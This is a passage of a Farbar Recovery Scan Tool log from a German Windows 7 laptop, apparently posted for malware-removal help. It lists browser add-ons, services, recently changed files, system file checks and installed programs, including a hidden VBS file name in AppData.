SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 172.20.10.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)

Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-14 10:43 - 2014-04-14 10:43 - 00017845 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-14 10:43 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-09 11:27 - 2014-04-09 11:27 - 00000076 _____ () C:\Users\Franz\Desktop\Neues Textdokument.txt
2014-04-09 11:26 - 2013-09-22 17:47 - 00073266 ___SH () C:\Users\Franz\Desktop\wtbchkxbde..txt
2014-04-09 11:25 - 2014-04-09 11:25 - 00023940 _____ () C:\Users\Franz\Desktop\smadav.log
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 __SHD () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-07 09:25 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 ___SH () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 __SHD () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

==================== One Month Modified Files and Folders =======

2014-04-14 10:43 - 2014-04-14 10:43 - 00017845 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-14 10:43 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-14 10:43 - 2013-04-16 19:13 - 01518797 _____ () C:\Windows\WindowsUpdate.log
2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-14 10:29 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-14 10:28 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-14 10:28 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-14 10:28 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-14 10:17 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-14 10:17 - 2009-07-14 06:51 - 00087045 _____ () C:\Windows\setupact.log
2014-04-14 10:16 - 2013-04-16 22:17 - 00000266 _____ () C:\Windows\Tasks\AutoKMS.job
2014-04-14 10:16 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-14 02:10 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-12 00:15 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-12 00:15 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-12 00:15 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-09 11:27 - 2014-04-09 11:27 - 00000076 _____ () C:\Users\Franz\Desktop\Neues Textdokument.txt
2014-04-09 11:25 - 2014-04-09 11:25 - 00023940 _____ () C:\Users\Franz\Desktop\smadav.log
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 __SHD () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-07 09:25 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 __SHD () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\AskSLib.dll
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\CNFNOT32.EXE_0004.exe
C:\Users\Franz\AppData\Local\Temp\DW20.EXE_0001.exe
C:\Users\Franz\AppData\Local\Temp\MSOHTMED.EXE.x64.exe
C:\Users\Franz\AppData\Local\Temp\MSOHTMED.EXE.x86.exe
C:\Users\Franz\AppData\Local\Temp\ONELEV.EXE_1031.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe
C:\Users\Franz\AppData\Local\Temp\SCANPST.EXE_0002.exe
C:\Users\Franz\AppData\Local\Temp\VSTOInstaller_exe_x86.3643236F_FC70_11D3_A536_0090278A1BB8.41B86362_9D8B_4D9B_B426_8A6D1F809A25.exe
C:\Users\Franz\AppData\Local\Temp\{AADC5B76-0A49-47B1-96B7-3174A4380421}-34.0.1847.116_33.0.1750.154_chrome_updater.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-03-24 00:49

==================== End Of Log ============================
         
--- --- ---

--- --- ---


Addition.txt:
Code:
ATTFilter
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13-04-2014 01
Ran by Franz at 2014-04-14 10:44:16
Running from C:\Users\Franz\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

AV: Avira Desktop (Enabled - Out of date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Desktop (Enabled - Out of date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

µTorrent (HKCU\...\uTorrent) (Version: 3.3.2.30488 - BitTorrent Inc.)
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.60 - NewTech Infosystems)
Acer Crystal Eye webcam (HKLM-x32\...\{51F026FA-5146-4232-A8BA-1364740BD053}) (Version: 1.0.3.5 - Liteon)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3011 - Acer Incorporated)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 5.02.3001 - Acer Incorporated)
Acer Updater (HKLM-x32\...\{EE171732-BEB4-4576-887D-CB62727F01CA}) (Version: 1.02.3001 - Acer Incorporated)
Acer VCM (HKLM-x32\...\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}) (Version: 4.05.3002 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe AIR (x32 Version: 1.5.0.7220 - Adobe Systems Inc.) Hidden
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.45.2 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{6030FCD7-8F1A-427D-AF05-8DD1A2EA2ABA}) (Version: 1.5.17.05094 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (x32 Version: 1.5.17.05094 - Alcor Micro Corp.) Hidden
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.105.2015.1110 - Alps Electric)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.20 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{F5816A09-786E-C91D-3D99-8A8C92648750}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Avira Free Antivirus (HKLM-x32\...\Avira AntiVir Desktop) (Version: 14.0.3.350 - Avira)
Backup Manager Basic (x32 Version: 2.0.0.60 - NewTech Infosystems) Hidden
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.01.000.18 - Atheros Communications)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2010.0421.657.10561 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2010.0421.657.10561 - ATI) Hidden
CCC Help Chinese Standard (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Czech (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Danish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Dutch (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help English (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Finnish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help French (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help German (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Greek (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Hungarian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Italian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Japanese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Korean (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Polish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Russian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Spanish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Swedish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Thai (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Turkish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
ccc-core-static (x32 Version: 2010.0421.657.10561 - Ihr Firmenname) Hidden
ccc-utility64 (Version: 2010.0421.657.10561 - ATI) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DC4BC0CC-A928-4C48-BA40-AC24784F46E5}) (Version:  - Microsoft)
Dropbox (HKCU\...\Dropbox) (Version: 2.4.11 - Dropbox, Inc.)
Fotogalerie (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 33.0.1750.154 - Google Inc.)
Google Update Helper (x32 Version: 1.3.23.9 - Google Inc.) Hidden
HP Officejet 4620 series - Grundlegende Software für das Gerät (HKLM\...\{B16F9E6E-1388-472C-98C3-F32D397EF85D}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Update (HKLM-x32\...\{6F1C00D2-25C2-4CBA-8126-AE9A6E2E9CD5}) (Version: 5.003.003.001 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3003 - Acer Incorporated)
iFunbox (v2.7.2386.747), iFunbox DevTeam (HKLM-x32\...\iFunbox_is1) (Version: v2.7.2386.747 - )
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
JDownloader 0.9 (HKLM-x32\...\5513-1208-7298-9440) (Version: 0.9 - AppWork GmbH)
Launch Manager (HKLM-x32\...\LManager) (Version: 4.0.10 - Acer Inc.)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office Access MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 32-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Italian) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 32-bit MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version:  - Pavel Cvrcek)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 24.3.0 - Mozilla)
Mozilla Thunderbird 24.3.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.3.0 (x86 de)) (Version: 24.3.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NetLimiter 3 (HKLM\...\{913923AB-3AAB-4870-8910-627C4CD82789}) (Version: 3.0.0.11 - Locktime Software s.r.o.)
Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
PX Profile Update (x32 Version: 1.00.1. - AMD) Hidden
